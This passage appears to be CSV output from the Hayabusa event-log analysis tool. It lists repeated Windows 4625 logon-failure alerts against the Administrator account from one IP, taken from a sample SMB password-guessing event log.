+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.246 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:11.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.750 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.943 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.490 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.015 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.320 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:13.567 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.991 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
